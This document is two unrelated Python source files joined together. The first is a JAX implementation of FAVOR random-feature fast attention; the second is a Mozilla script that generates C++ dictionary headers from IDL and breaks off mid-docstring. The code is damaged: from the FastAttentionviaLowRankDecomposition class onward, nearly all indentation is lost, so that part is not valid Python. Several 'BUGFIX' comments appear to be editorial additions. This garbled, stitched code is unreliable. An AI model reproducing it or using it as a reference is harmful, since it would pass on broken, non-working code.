      data: input for which features are computed.
      projection_matrix: random matrix used to compute features.
      attention_dims_t: tuple of attention dimensions.
      batch_dims_t: tuple of batch dimensions.
      precision: precision parameter for the contraction.
      is_query: whether ``data`` holds queries (stabilized per position)
        rather than keys (stabilized over attention dims too).
      normalize_data: whether to fold the 1/sqrt(sqrt(d)) softmax scaling
        into the data.
      eps: numerical stabilizer added to the (positive) features.

    Returns:
      Random features for fast softmax attention.
    """
    # e^{qk^T/sqrt(d)} = e^{q_norm k_norm^T} where w_norm = w * normalizer.
    normalizer = 1.0 / (jnp.sqrt(jnp.sqrt(data.shape[-1]))) if normalize_data else 1.0
    ratio = 1.0 / jnp.sqrt(projection_matrix.shape[0])

    # Broadcast the projection across the batch dims, then contract the
    # channel dim of the data against it.
    broadcast_shape = data.shape[0:len(batch_dims_t)] + projection_matrix.shape
    projection = jnp.zeros(broadcast_shape) + projection_matrix
    features = lax.dot_general(
        normalizer * data,
        projection,
        (((data.ndim - 1,), (projection.ndim - 1,)),
         (batch_dims_t, batch_dims_t)),
        precision=precision)

    # ||x||^2 / 2 (after normalization), kept with a trailing singleton dim.
    sq_norms = jnp.square(data)
    sq_norms = jnp.sum(sq_norms, axis=data.ndim - 1)
    sq_norms = (sq_norms / 2.0) * normalizer * normalizer
    sq_norms = jnp.expand_dims(sq_norms, axis=data.ndim - 1)

    # Queries subtract their own per-position max; keys also reduce over the
    # attention dims so that both sides share a consistent stabilization.
    last_dims = (len(features.shape) - 1,)
    max_axes = last_dims if is_query else last_dims + attention_dims_t
    stabilized = features - sq_norms - jnp.max(features, axis=max_axes, keepdims=True)
    return ratio * (jnp.exp(stabilized) + eps)
def sincos_softmax_kernel_feature_creator(data,
                                          projection_matrix,
                                          attention_dims_t,
                                          batch_dims_t,
                                          precision,
                                          normalize_data=True):
    """Constructs kernel sin-cos features for fast softmax attention.

    Args:
      data: input for which features are computes
      projection_matrix: random matrix used to compute features
      attention_dims_t: tuple of attention dimensions
      batch_dims_t: tuple of batch dimensions
      precision: precision parameter
      normalize_data: predicate indicating whether data should be normalized.

    Returns:
      Random features for fast softmax attention.
    """
    if normalize_data:
        # We have: exp(qk^T/sqrt{d}) = exp(|q|^2/2sqrt{d}) * exp(|k|^2/2sqrt{d}) *
        # exp(-(|q*c-k*c|^2)/2), where c = 1.0 / sqrt{sqrt{d}}.
        data_normalizer = 1.0 / (jnp.sqrt(jnp.sqrt(data.shape[-1])))
    else:
        data_normalizer = 1.0
    ratio = 1.0 / jnp.sqrt(projection_matrix.shape[0])
    # Broadcast the projection matrix across the batch dims, then contract the
    # trailing channel dim of the data against it.
    data_mod_shape = data.shape[0:len(batch_dims_t)] + projection_matrix.shape
    data_thick_random_matrix = jnp.zeros(data_mod_shape) + projection_matrix

    data_dash = lax.dot_general(
        data_normalizer * data,
        data_thick_random_matrix,
        (((data.ndim - 1,), (data_thick_random_matrix.ndim - 1,)),
         (batch_dims_t, batch_dims_t)),
        precision=precision)
    # Trigonometric random features, concatenated along the feature axis.
    data_dash_cos = ratio * jnp.cos(data_dash)
    data_dash_sin = ratio * jnp.sin(data_dash)
    data_dash = jnp.concatenate((data_dash_cos, data_dash_sin), axis=-1)

    # Constructing D_data and data^{'}: exp(|x|^2/2) factor per position.
    diag_data = jnp.square(data)
    diag_data = jnp.sum(diag_data, axis=data.ndim - 1)
    diag_data = (diag_data / 2.0) * data_normalizer * data_normalizer
    diag_data = jnp.expand_dims(diag_data, axis=data.ndim - 1)

    # Additional renormalization for numerical stability
    data_renormalizer = jnp.max(diag_data, attention_dims_t, keepdims=True)
    diag_data -= data_renormalizer
    diag_data = jnp.exp(diag_data)

    data_prime = data_dash * diag_data
    return data_prime
def generalized_kernel_feature_creator(data, projection_matrix, batch_dims_t,
                                       precision, kernel_fn, kernel_epsilon,
                                       normalize_data):
    """Constructs kernel features for fast generalized attention.

    Args:
      data: input for which features are computed.
      projection_matrix: matrix used to compute features, or None for
        deterministic (projection-free) features.
      batch_dims_t: tuple of batch dimensions.
      precision: precision parameter for the contraction.
      kernel_fn: elementwise kernel function applied to the (projected) data.
      kernel_epsilon: additive positive term added to every feature for
        numerical stability.
      normalize_data: whether to fold the 1/sqrt(sqrt(d)) scaling into the
        data.

    Returns:
      Features for fast generalized attention.
    """
    normalizer = 1.0 / (jnp.sqrt(jnp.sqrt(data.shape[-1]))) if normalize_data else 1.0

    # Deterministic variant: apply the kernel directly, no projection.
    if projection_matrix is None:
        return kernel_fn(normalizer * data) + kernel_epsilon

    # Broadcast the projection across batch dims, contract the channel dim.
    broadcast_shape = data.shape[0:len(batch_dims_t)] + projection_matrix.shape
    projection = jnp.zeros(broadcast_shape) + projection_matrix
    projected = lax.dot_general(
        normalizer * data,
        projection,
        (((data.ndim - 1,), (projection.ndim - 1,)),
         (batch_dims_t, batch_dims_t)),
        precision=precision)
    return kernel_fn(projected) + kernel_epsilon
@gin.configurable
def make_fast_softmax_attention(qkv_dim,
                                renormalize_attention=True,
                                numerical_stabilizer=0.000001,
                                nb_features=256,
                                ortho_features=True,
                                ortho_scaling=0.0,
                                redraw_features=True,
                                unidirectional=False,
                                nonnegative_features=True,
                                lax_scan_unroll=1):
    """Construct a fast softmax attention method.

    Returns a ``dot_product_attention``-compatible callable that uses FAVOR
    random features to approximate softmax attention.
    """
    logging.info(
        'Fast softmax attention: %s features and orthogonal=%s, renormalize=%s',
        nb_features, ortho_features, renormalize_attention)

    # How the random projection matrix is drawn.
    if ortho_features:
        matrix_creator = functools.partial(
            GaussianOrthogonalRandomMatrix,
            nb_features,
            qkv_dim,
            scaling=ortho_scaling)
    else:
        matrix_creator = functools.partial(
            GaussianUnstructuredRandomMatrix, nb_features, qkv_dim)

    # Which feature map approximates the softmax kernel.
    if nonnegative_features:
        def kernel_feature_creator(data, projection_matrix, attention_dims_t,
                                   batch_dims_t, precision, is_query,
                                   normalize_data=True):
            return nonnegative_softmax_kernel_feature_creator(
                data, projection_matrix, attention_dims_t, batch_dims_t,
                precision, is_query, normalize_data, numerical_stabilizer)
    else:
        def kernel_feature_creator(data, projection_matrix, attention_dims_t,
                                   batch_dims_t, precision, is_query,
                                   normalize_data=True):
            # sin/cos features treat queries and keys identically.
            del is_query
            return sincos_softmax_kernel_feature_creator(
                data, projection_matrix, attention_dims_t, batch_dims_t,
                precision, normalize_data)

    fast_attention = FastAttentionviaLowRankDecomposition(
        matrix_creator,
        kernel_feature_creator,
        renormalize_attention=renormalize_attention,
        numerical_stabilizer=numerical_stabilizer,
        redraw_features=redraw_features,
        unidirectional=unidirectional,
        lax_scan_unroll=lax_scan_unroll)
    return fast_attention.dot_product_attention
@gin.configurable
def make_fast_generalized_attention(qkv_dim,
                                    renormalize_attention=True,
                                    numerical_stabilizer=0.0,
                                    nb_features=256,
                                    features_type='deterministic',
                                    kernel_fn=jax.nn.relu,
                                    kernel_epsilon=0.001,
                                    redraw_features=False,
                                    unidirectional=False,
                                    lax_scan_unroll=1):
    """Construct a fast generalized attention method."""
    logging.info('Fast generalized attention.: %s features and renormalize=%s',
                 nb_features, renormalize_attention)

    # Dispatch table mapping feature type to a projection-matrix factory
    # (None means deterministic, projection-free features).
    creators = {
        'ortho': functools.partial(
            GaussianOrthogonalRandomMatrix, nb_features, qkv_dim, scaling=False),
        'iid': functools.partial(
            GaussianUnstructuredRandomMatrix, nb_features, qkv_dim),
        'deterministic': None,
    }
    if features_type not in creators:
        raise ValueError('Unknown feature value type')
    matrix_creator = creators[features_type]

    def kernel_feature_creator(data, projection_matrix, attention_dims_t,
                               batch_dims_t, precision, is_query,
                               normalize_data=False):
        # Generalized features ignore the attention dims and the
        # query/key distinction.
        del attention_dims_t
        del is_query
        return generalized_kernel_feature_creator(
            data, projection_matrix, batch_dims_t, precision, kernel_fn,
            kernel_epsilon, normalize_data)

    return FastAttentionviaLowRankDecomposition(
        matrix_creator,
        kernel_feature_creator,
        renormalize_attention=renormalize_attention,
        numerical_stabilizer=numerical_stabilizer,
        redraw_features=redraw_features,
        unidirectional=unidirectional,
        lax_scan_unroll=lax_scan_unroll).dot_product_attention
class RandomMatrix(object, metaclass=abc.ABCMeta):
    r"""Abstract class providing a method for constructing 2D random arrays.

    Class is responsible for constructing 2D random arrays.
    """
    # BUGFIX: the original used ``__metaclass__ = abc.ABCMeta``, which is the
    # Python 2 spelling and is silently ignored on Python 3 — the class was
    # therefore not actually abstract. The ``metaclass=`` keyword restores
    # ABC enforcement; concrete subclasses override get_2d_array and are
    # unaffected.

    @abc.abstractmethod
    def get_2d_array(self):
        """Return a 2D array of random entries; implemented by subclasses."""
        raise NotImplementedError('Abstract method')
class GaussianUnstructuredRandomMatrix(RandomMatrix):
    """Unstructured random projection: i.i.d. standard Gaussian entries."""

    def __init__(self, nb_rows, nb_columns, key):
        # key: a JAX PRNG key used when the array is materialized.
        self.nb_rows, self.nb_columns, self.key = nb_rows, nb_columns, key

    def get_2d_array(self):
        """Samples an (nb_rows, nb_columns) array of standard normals."""
        shape = (self.nb_rows, self.nb_columns)
        return random.normal(self.key, shape)
class GaussianOrthogonalRandomMatrix(RandomMatrix):
    r"""Class providing a method to create Gaussian orthogonal matrix.

    Class is responsible for constructing 2D Gaussian orthogonal arrays.
    """

    def __init__(self, nb_rows, nb_columns, key, scaling=0):
        # scaling: 0 -> rows rescaled to the norms of i.i.d. Gaussian rows,
        #          1 -> all rows rescaled to sqrt(nb_columns).
        self.nb_rows = nb_rows
        self.nb_columns = nb_columns
        self.key = key
        self.scaling = scaling

    def get_2d_array(self):
        """Returns an (nb_rows, nb_columns) matrix built from orthogonal row blocks."""
        nb_full_blocks = int(self.nb_rows / self.nb_columns)
        block_list = []
        rng = self.key
        # Stack square orthogonal blocks obtained by QR of Gaussian samples.
        for _ in range(nb_full_blocks):
            rng, rng_input = jax.random.split(rng)
            unstructured_block = random.normal(rng_input,
                                               (self.nb_columns, self.nb_columns))
            q, _ = jnp.linalg.qr(unstructured_block)
            q = jnp.transpose(q)
            block_list.append(q)
        # Possibly one partial block to reach exactly nb_rows rows.
        remaining_rows = self.nb_rows - nb_full_blocks * self.nb_columns
        if remaining_rows > 0:
            rng, rng_input = jax.random.split(rng)
            unstructured_block = random.normal(rng_input,
                                               (self.nb_columns, self.nb_columns))
            q, _ = jnp.linalg.qr(unstructured_block)
            q = jnp.transpose(q)
            block_list.append(q[0:remaining_rows])
        final_matrix = jnp.vstack(block_list)

        if self.scaling == 0:
            # Rescale rows to match the norms of i.i.d. Gaussian rows.
            multiplier = jnp.linalg.norm(
                random.normal(self.key, (self.nb_rows, self.nb_columns)), axis=1)
        elif self.scaling == 1:
            multiplier = jnp.sqrt(float(self.nb_columns)) * jnp.ones((self.nb_rows))
        else:
            # BUGFIX: the original referenced the nonexistent ``self._scaling``
            # here, turning the intended ValueError into an AttributeError.
            raise ValueError('Scaling must be one of {0, 1}. Was %s' % self.scaling)

        return jnp.matmul(jnp.diag(multiplier), final_matrix)
class FastAttention(object, metaclass=abc.ABCMeta):
    r"""Abstract class providing a method for fast attention.

    Class is responsible for providing a method <dot_product_attention> for fast
    approximate attention.
    """
    # BUGFIX: the original used ``__metaclass__ = abc.ABCMeta``, the Python 2
    # spelling that Python 3 silently ignores, so the abstract method was not
    # enforced. The ``metaclass=`` keyword restores ABC behavior; concrete
    # subclasses override dot_product_attention and are unaffected.

    @abc.abstractmethod
    def dot_product_attention(self,
                              query,
                              key,
                              value,
                              dtype=jnp.float32,
                              bias=None,
                              axis=None,
                              broadcast_dropout=True,
                              dropout_rng=None,
                              dropout_rate=0.,
                              deterministic=False,
                              precision=None):
        """Computes dot-product attention given query, key, and value.

        This is the core function for applying fast approximate dot-product
        attention. It calculates the attention weights given query and key and
        combines the values using the attention weights. This function supports
        multi-dimensional inputs.

        Args:
          query: queries for calculating attention with shape of [batch_size, dim1,
            dim2, ..., dimN, num_heads, mem_channels].
          key: keys for calculating attention with shape of [batch_size, dim1, dim2,
            ..., dimN, num_heads, mem_channels].
          value: values to be used in attention with shape of [batch_size, dim1,
            dim2,..., dimN, num_heads, value_channels].
          dtype: the dtype of the computation (default: float32)
          bias: bias for the attention weights. This can be used for incorporating
            autoregressive mask, padding mask, proximity bias.
          axis: axises over which the attention is applied.
          broadcast_dropout: bool: use a broadcasted dropout along batch dims.
          dropout_rng: JAX PRNGKey: to be used for dropout.
          dropout_rate: dropout rate.
          deterministic: bool, deterministic or not (to apply dropout).
          precision: numerical precision of the computation see `jax.lax.Precision`
            for details.

        Returns:
          Output of shape [bs, dim1, dim2, ..., dimN,, num_heads, value_channels].
        """
        raise NotImplementedError('Abstract method')
def _numerator(z_slice_shape, precision, unroll=1):
    """Builds the prefix-sum numerator of unidirectional FAVOR attention.

    Returns a function (qs, ks, vs) -> outputs whose custom VJP re-derives the
    per-step prefix sums during the backward scan instead of storing them,
    trading compute for memory.

    Args:
      z_slice_shape: shape of the per-step accumulator p (outer-product slice).
      precision: precision passed to every einsum.
      unroll: unroll factor forwarded to lax.scan.
    """
    def fwd(qs, ks, vs):
        # Forward scan: p accumulates sum_j k_j v_j^T; step i emits q_i . p.
        def body(p, qkv):
            (q, k, v) = qkv
            p += jnp.einsum('...m,...d->...md', k, v, precision=precision)
            X_slice = jnp.einsum('...m,...md->...d', q, p, precision=precision)
            return p, X_slice
        init_value = jnp.zeros(z_slice_shape)
        p, W = lax.scan(body, init_value, (qs, ks, vs), unroll=unroll)
        # Residuals: only the final p plus the inputs are kept.
        return W, (p, qs, ks, vs)

    def bwd(pqkv, W_ct):
        # Reverse scan: p is reconstructed at each step by subtracting the
        # step's contribution, so intermediate prefix sums are never stored.
        def body(carry, qkv_xct):
            p, p_ct = carry
            q, k, v, x_ct = qkv_xct
            q_ct = jnp.einsum('...d,...md->...m', x_ct, p, precision=precision)
            p_ct += jnp.einsum('...d,...m->...md', x_ct, q, precision=precision)
            k_ct = jnp.einsum('...md,...d->...m', p_ct, v, precision=precision)
            v_ct = jnp.einsum('...md,...m->...d', p_ct, k, precision=precision)
            p -= jnp.einsum('...m,...d->...md', k, v, precision=precision)
            return (p, p_ct), (q_ct, k_ct, v_ct)
        p, qs, ks, vs = pqkv
        _, (qs_ct, ks_ct, vs_ct) = lax.scan(
            body, (p, jnp.zeros_like(p)), (qs, ks, vs, W_ct),
            reverse=True,
            unroll=unroll)
        return qs_ct, ks_ct, vs_ct

    @jax.custom_vjp
    def _numerator_impl(qs, ks, vs):
        W, _ = fwd(qs, ks, vs)
        return W

    _numerator_impl.defvjp(fwd, bwd)

    return _numerator_impl
def _denominator(t_slice_shape, precision, unroll=1):
    """Builds the prefix-sum denominator of unidirectional FAVOR attention.

    Returns a function (qs, ks) -> normalizers whose custom VJP reconstructs
    the key prefix sums during the reverse scan rather than storing them
    (memory-lean counterpart of _numerator).

    Args:
      t_slice_shape: shape of the per-step key accumulator p.
      precision: precision passed to every einsum.
      unroll: unroll factor forwarded to lax.scan.
    """
    def fwd(qs, ks):
        # Forward scan: p accumulates sum_j k_j; step i emits q_i . p.
        def body(p, qk):
            q, k = qk
            p += k
            x = jnp.einsum('...m,...m->...', q, p, precision=precision)
            return p, x
        p = jnp.zeros(t_slice_shape)
        p, R = lax.scan(body, p, (qs, ks), unroll=unroll)
        # Residuals: inputs plus only the final accumulator.
        return R, (qs, ks, p)

    def bwd(qkp, R_ct):
        # Reverse scan: undo each step's ``p += k`` to recover the running
        # prefix sum without having stored the intermediates.
        def body(carry, qkx):
            p, p_ct = carry
            q, k, x_ct = qkx
            q_ct = jnp.einsum('...,...m->...m', x_ct, p, precision=precision)
            p_ct += jnp.einsum('...,...m->...m', x_ct, q, precision=precision)
            k_ct = p_ct
            p -= k
            return (p, p_ct), (q_ct, k_ct)
        qs, ks, p = qkp
        _, (qs_ct, ks_ct) = lax.scan(
            body, (p, jnp.zeros_like(p)), (qs, ks, R_ct),
            reverse=True,
            unroll=unroll)
        return (qs_ct, ks_ct)

    @jax.custom_vjp
    def _denominator_impl(qs, ks):
        R, _ = fwd(qs, ks)
        return R

    _denominator_impl.defvjp(fwd, bwd)

    return _denominator_impl
class FastAttentionviaLowRankDecomposition(FastAttention):
r"""Class providing a method for fast attention via low rank decomposition.
Class is responsible for providing a method <dot_product_attention> for fast
dot-product attention with the use of low rank decomposition (e.g. with
random feature maps).
"""
def __init__(self,
             matrix_creator,
             kernel_feature_creator,
             renormalize_attention,
             numerical_stabilizer,
             redraw_features,
             unidirectional,
             lax_scan_unroll=1):  # For optimal GPU performance, set to 16.
    """Sets up low-rank attention state.

    Args:
      matrix_creator: factory producing the random projection matrix (or
        None for deterministic, projection-free features).
      kernel_feature_creator: callable mapping (data, projection, ...) to
        kernel features for queries/keys.
      renormalize_attention: whether attention weights are renormalized.
      numerical_stabilizer: small constant for numerical stability.
      redraw_features: whether the projection matrix is redrawn per call.
      unidirectional: whether attention is causal (prefix-sum based).
      lax_scan_unroll: unroll factor for the lax.scan loops.
    """
    # Initial projection is drawn from a fixed seed; it may be replaced
    # later when redraw_features is set.
    rng = random.PRNGKey(0)
    self.matrix_creator = matrix_creator
    self.projection_matrix = self.draw_weights(rng)
    self.kernel_feature_creator = kernel_feature_creator
    self.renormalize_attention = renormalize_attention
    self.numerical_stabilizer = numerical_stabilizer
    self.redraw_features = redraw_features
    self.unidirectional = unidirectional
    self.lax_scan_unroll = lax_scan_unroll
def draw_weights(self, key):
if self.matrix_creator is None:
return None
matrixrng, _ = random.split(key)
projection_matrix = self.matrix_creator(key=matrixrng).get_2d_array()
return projection_matrix
def dot_product_attention(self,
query,
key,
value,
dtype=jnp.float32,
bias=None,
axis=None,
broadcast_dropout=True,
dropout_rng=None,
dropout_rate=0.,
deterministic=False,
precision=None):
assert key.shape[:-1] == value.shape[:-1]
assert (query.shape[0:1] == key.shape[0:1] and
query.shape[-1] == key.shape[-1])
if axis is None:
axis = tuple(range(1, key.ndim - 2))
if not isinstance(axis, Iterable):
axis = (axis,)
assert key.ndim == query.ndim
assert key.ndim == value.ndim
for ax in axis:
if not (query.ndim >= 3 and 1 <= ax < query.ndim - 2):
raise ValueError('Attention axis must be between the batch '
'axis and the last-two axes.')
n = key.ndim
# Constructing projection tensor.
if self.redraw_features:
# TODO(kchoro): Get rid of the constant below.
query_seed = lax.convert_element_type(
jnp.ceil(jnp.sum(query) * 10000000.0), jnp.int32)
rng = random.PRNGKey(query_seed)
self.projection_matrix = self.draw_weights(rng)
# batch_dims is <bs, <non-attention dims>, num_heads>
batch_dims = tuple(onp.delete(range(n), axis + (n - 1,)))
# q & k -> (bs, <non-attention dims>, num_heads, <attention dims>, channels)
qk_perm = batch_dims + axis + (n - 1,)
k_extra_perm = axis + batch_dims + (n - 1,)
key_extra = key.transpose(k_extra_perm)
key = key.transpose(qk_perm)
query = query.transpose(qk_perm)
# v -> (bs, <non-attention dims>, num_heads, <attention dims>, channels)
v_perm = batch_dims + axis + (n - 1,)
value = value.transpose(v_perm)
batch_dims_t = tuple(range(len(batch_dims)))
attention_dims_t = tuple(
range(len(batch_dims),
len(batch_dims) + len(axis)))
# Constructing tensors Q^{'} and K^{'}.
query_prime = self.kernel_feature_creator(query, self.projection_matrix,
attention_dims_t, batch_dims_t,
precision, True)
key_prime = self.kernel_feature_creator(key, self.projection_matrix,
attention_dims_t, batch_dims_t,
precision, False)
if self.unidirectional:
index = attention_dims_t[0]
z_slice_shape = key_prime.shape[0:len(batch_dims_t)] + (
key_prime.shape[-1],) + (value.shape[-1],)
numerator_fn = _numerator(z_slice_shape, precision, self.lax_scan_unroll)
W = numerator_fn(
jnp.moveaxis(query_prime, index, 0),
jnp.moveaxis(key_prime, index, 0), jnp.moveaxis(value, index, 0))
# Constructing W = (Q^{'}(K^{'})^{T})_{masked}V
W = jnp.moveaxis(W, 0, index)
if not self.renormalize_attention:
# Unidirectional, not-normalized attention.
perm_inv = _invert_perm(qk_perm)
result = W.transpose(perm_inv)
return result
else:
# Unidirectional, normalized attention.
thick_all_ones = jnp.zeros(key.shape[0:-1]) + jnp.ones(
key_extra.shape[0:len(axis)])
index = attention_dims_t[0]
t_slice_shape = key_prime.shape[0:len(batch_dims_t)] + (
key_prime.shape[-1],)
denominator_fn = _denominator(t_slice_shape, precision,
self.lax_scan_unroll)
R = denominator_fn(
jnp.moveaxis(query_prime, index, 0),
jnp.moveaxis(key_prime, index, 0))
R = jnp.moveaxis(R, 0, index)
else:
contract_query = tuple(
range(len(batch_dims) + len(axis),
len(batch_dims) + len(axis) + 1))
contract_z = tuple(range(len(batch_dims), len(batch_dims) + 1))
# Constructing Z = (K^{'})^{T}V
# Z (bs, <non-attention dims>, num_heads, channels_m, channels_v)
Z = lax.dot_general(
key_prime,
value,
((attention_dims_t, attention_dims_t), (batch_dims_t, batch_dims_t)),
precision=precision)
# Constructing W = Q^{'}Z = Q^{'}(K^{'})^{T}V
# q (bs, <non-attention dims>, num_heads, <attention dims>, channels_m)
# Z (bs, <non-attention dims>, num_heads, channels_m, channels_v)
# W (bs, <non-attention dims>, num_heads, <attention dims>, channels_v)
W = lax.dot_general(
query_prime,
Z, ((contract_query, contract_z), (batch_dims_t, batch_dims_t)),
precision=precision)
if not self.renormalize_attention:
# Bidirectional, not-normalized attention.
perm_inv = _invert_perm(qk_perm)
result = W.transpose(perm_inv)
return result
else:
# Bidirectional, normalized attention.
thick_all_ones = jnp.zeros(key.shape[0:-1]) + jnp.ones(
key_extra.shape[0:len(axis)])
contract_key = tuple(
range(len(batch_dims),
len(batch_dims) + len(axis)))
contract_thick_all_ones = tuple(
range(thick_all_ones.ndim - len(axis), thick_all_ones.ndim))
# Construct T = (K^{'})^{T} 1_L
# k (bs, <non-attention dims>, num_heads, <attention dims>, channels)
T = lax.dot_general(
key_prime,
thick_all_ones, ((contract_key, contract_thick_all_ones),
(batch_dims_t, batch_dims_t)),
precision=precision)
# Construct partition function: R = Q^{'} T = Q^{'}(K^{'})^{T} 1_L
# q_p (bs, <non-attention dims>, num_heads, <attention dims>, channs_m)
# T (bs, <non-attention dims>, num_heads, channels_m)
R = lax.dot_general(
query_prime,
T, (((query_prime.ndim - 1,), (T.ndim - 1,)),
(batch_dims_t, range(0,
len(T.shape) - 1))),
precision=precision)
R = R + 2 * self.numerical_stabilizer * (
jnp.abs(R) <= self.numerical_stabilizer)
R = jnp.reciprocal(R)
R = jnp.expand_dims(R, len(R.shape))
# W (bs, <non-attention dims>, num_heads, <attention dims>, channels_v)
# R (bs, <non-attention dims>, num_heads, <attention dims>, extra_channel)
result = W * R
# back to (bs, dim1, dim2, ..., dimN, num_heads, channels)
perm_inv = _invert_perm(qk_perm)
result = result.transpose(perm_inv)
return result
def _invert_perm(perm):
perm_inv = [0] * len(perm)
for i, j in enumerate(perm):
perm_inv[j] = i
return tuple(perm_inv)
| |
#!/usr/bin/env python
# header.py - Generate C++ header files from IDL.
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
from codegen import *
import sys, os.path, re, xpidl, itertools
# --makedepend-output support.
make_dependencies = []  # every IDL file read (appended in loadIDL)
make_targets = []  # output files; the first entry is the primary make target
def strip_begin(text, suffix):
    """Return `text` with the leading `suffix` (a prefix) removed, if present."""
    if text.startswith(suffix):
        return text[len(suffix):]
    return text
def strip_end(text, suffix):
    """Return `text` with the trailing `suffix` removed, if present.

    Bug fix: the original returned text[:-len(suffix)], which is text[:-0]
    == "" when suffix is empty; slicing by length difference is safe for
    every suffix, including "".
    """
    if not text.endswith(suffix):
        return text
    return text[:len(text) - len(suffix)]
# Copied from dombindingsgen.py
def writeMakeDependOutput(filename):
    """Write a gnumake dependency file: the first target depends on every
    IDL file read, and each remaining target depends on the first.

    NOTE: Python 2 print statement; `makeQuote` comes from
    `from codegen import *`.
    """
    print "Creating makedepend file", filename
    f = open(filename, 'w')
    try:
        if len(make_targets) > 0:
            f.write("%s:" % makeQuote(make_targets[0]))
            # NOTE(review): the loops below deliberately reuse (shadow)
            # the `filename` parameter as the loop variable.
            for filename in make_dependencies:
                f.write(' \\\n\t\t%s' % makeQuote(filename))
            f.write('\n\n')
            for filename in make_targets[1:]:
                f.write('%s: %s\n' % (makeQuote(filename), makeQuote(make_targets[0])))
    finally:
        f.close()
def findIDL(includePath, interfaceFileName):
    """Return the path of `interfaceFileName` under the first directory of
    `includePath` that contains it.

    Raises BaseException when the file is found in none of the directories.
    NOTE(review): raising BaseException directly is unusual; kept so existing
    callers/behavior are unchanged.
    """
    for directory in includePath:
        # Not os.path.join: we need a forward slash even on Windows because
        # this filename ends up in makedepend output.
        candidate = directory + '/' + interfaceFileName
        if os.path.exists(candidate):
            return candidate
    raise BaseException("No IDL file found for interface %s "
                        "in include path %r"
                        % (interfaceFileName, includePath))
def loadIDL(parser, includePath, filename):
    """Locate, parse and resolve the IDL file `filename`.

    Records the located file in `make_dependencies` (once) so it appears in
    --makedepend-output.

    Bug fix: the original body ignored the `parser` argument and used the
    module-level global `p` instead, which only worked because __main__
    happens to create a global named `p`. Both callers already pass `p`,
    so using the parameter is behavior-compatible and makes the function
    usable with any parser instance.
    """
    idlFile = findIDL(includePath, filename)
    if not idlFile in make_dependencies:
        make_dependencies.append(idlFile)
    idl = parser.parse(open(idlFile).read(), idlFile)
    idl.resolve(includePath, parser)
    return idl
class Configuration:
    """Dictionary-generator settings loaded by exec'ing a Python config file."""
    def __init__(self, filename):
        config = {}
        # NOTE: Python 2 execfile; the config file is trusted build input.
        execfile(filename, config)
        # List of (dictionary-name, idl-file) pairs to generate.
        self.dictionaries = config.get('dictionaries', [])
        # Extra headers to #include in the generated .cpp.
        self.special_includes = config.get('special_includes', [])
        # Type names whose headers must NOT be auto-included.
        self.exclude_automatic_type_include = config.get('exclude_automatic_type_include', [])
def readConfigFile(filename):
    """Load and return a Configuration parsed from `filename`."""
    return Configuration(filename)
def firstCap(str):
    """Return `str` with its first character upper-cased.

    Bug fix: the original indexed str[0] and raised IndexError on an empty
    string; str[:1] makes the empty string a no-op.
    NOTE(review): the parameter shadows the builtin `str`; the name is kept
    for interface compatibility.
    """
    return str[:1].upper() + str[1:]
def attributeVariableTypeAndName(a):
    """Return the C++ member declaration (type and name) for attribute `a`.

    Pointer types become nsCOMPtr<T>, nsAString becomes nsString, JS::Value
    stays JS::Value; anything else uses the native type verbatim (which
    already carries its trailing spacing).
    """
    native = a.realtype.nativeType('in')
    if native.endswith('*'):
        decl = "nsCOMPtr<%s> %s" % (native.strip('* '), a.name)
    elif "nsAString" in native:
        decl = "nsString %s" % a.name
    elif "JS::Value" in native:
        decl = "JS::Value %s" % a.name
    else:
        decl = "%s%s" % (native, a.name)
    return decl
def print_header(idl, fd, conf, dictname, dicts):
    """Emit header declarations for each dictionary production in `idl`.

    Base dictionaries not yet in `dicts` are written first (base-most
    first); `dicts` is updated in place so nothing is emitted twice.
    `conf` and `dictname` are unused (kept for interface compatibility).
    """
    for production in idl.productions:
        if production.kind != 'dictionary':
            continue
        pending = []
        base = production.base
        iface = production
        while base is not None and base not in dicts:
            iface = iface.idl.getName(iface.base, iface.location)
            dicts.append(base)
            pending.append(iface)
            base = iface.base
        pending.reverse()
        for ancestor in pending:
            write_header(ancestor, fd)
        if production.name not in dicts:
            dicts.append(production.name)
            write_header(production, fd)
def print_header_file(fd, conf):
    """Write the complete generated header (DictionaryHelpers.h) to `fd`.

    Relies on the module-level parser `p` and `options.incdirs` created in
    the __main__ block.
    """
    fd.write("/* THIS FILE IS AUTOGENERATED - DO NOT EDIT */\n\n"
             "#ifndef _gen_mozilla_idl_dictionary_helpers_h_\n"
             "#define _gen_mozilla_idl_dictionary_helpers_h_\n\n")
    fd.write("#include \"jsapi.h\"\n"
             "#include \"nsError.h\"\n"
             "#include \"nsString.h\"\n"
             "#include \"nsCOMPtr.h\"\n\n")
    # win32 namespace issues
    fd.write("#undef near\n"
             "\n\n")
    forwards = []
    attrnames = []
    for d in conf.dictionaries:
        idl = loadIDL(p, options.incdirs, d[1])
        collect_names_and_non_primitive_attribute_types(idl, d[0], attrnames, forwards)
    # Forward-declare every non-primitive attribute type collected above.
    for c in forwards:
        fd.write("class %s;\n" % c)
    fd.write("\n"
             "namespace mozilla {\n"
             "namespace dom {\n\n")
    dicts = []
    for d in conf.dictionaries:
        # `dicts` tracks what was already emitted, across config entries.
        if not d[0] in set(dicts):
            idl = loadIDL(p, options.incdirs, d[1])
            print_header(idl, fd, conf, d[0], dicts)
    fd.write("}\n"
             "}\n"
             "#endif\n")
def collect_names_and_non_primitive_attribute_types(idl, dictname, attrnames, forwards):
    """Accumulate attribute names and forward-declarable types for every
    dictionary in `idl`, walking each base chain from base-most to derived.

    `attrnames` and `forwards` are extended in place; `dictname` is unused
    (kept for interface compatibility).
    """
    for production in idl.productions:
        if production.kind != 'dictionary':
            continue
        chain = []
        base = production.base
        iface = production
        while base is not None:
            iface = iface.idl.getName(iface.base, iface.location)
            chain.append(iface)
            base = iface.base
        chain.reverse()
        chain.append(production)
        for member_iface in chain:
            collect_names_and_non_primitive_attribute_types_from_interface(member_iface, attrnames, forwards)
def collect_names_and_non_primitive_attribute_types_from_interface(iface, attrnames, forwards):
    """Record each attribute's name and, for pointer-typed attributes, the
    bare class name (for forward declaration). Duplicates are skipped."""
    for member in iface.members:
        if not isinstance(member, xpidl.Attribute):
            continue
        if member.name not in attrnames:
            attrnames.append(member.name)
        native = member.realtype.nativeType('in')
        if native.endswith('*'):
            bare = native.strip('* ')
            if bare not in forwards:
                forwards.append(bare)
def print_cpp(idl, fd, conf, dictname, dicts):
    """Emit .cpp definitions for each dictionary production in `idl`.

    Mirrors print_header: unseen base dictionaries are written first
    (base-most first) and `dicts` is updated in place. `conf` and
